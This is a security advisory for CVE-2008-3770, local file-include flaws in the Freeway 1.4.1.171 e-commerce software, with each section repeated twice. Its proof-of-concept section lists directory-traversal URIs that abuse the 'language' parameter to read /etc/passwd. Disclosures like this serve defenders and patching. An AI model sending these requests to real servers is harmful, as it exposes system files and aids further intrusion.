Freeway 'language' Parameter Multiple Local File Include Vulnerabilities
BID:30731
Info
Freeway 'language' Parameter Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 30731 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3770 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 18 2008 12:00AM |
| Updated: | Apr 16 2015 05:55PM |
| Credit: | Digital Security Research Group |
| Vulnerable: |
Freeway Project Freeway 1.4.1 .171 |
| Not Vulnerable: |
Freeway Project Freeway 1.4.2 .197 |
Discussion
Freeway 'language' Parameter Multiple Local File Include Vulnerabilities
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
Exploit / POC
Freeway 'language' Parameter Multiple Local File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00
Solution / Fix
Freeway 'language' Parameter Multiple Local File Include Vulnerabilities
Solution:
The vendor has released an update. Please see the references for more information.
Solution:
The vendor has released an update. Please see the references for more information.
References
Freeway 'language' Parameter Multiple Local File Include Vulnerabilities
References:
References:
- Freeway 1.4.2.197 patch notes (Freeway Project)
- Freeway Homepage (Freeway Project)
- [DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171 ("Digital Security Research Group \[DSecRG\]"
)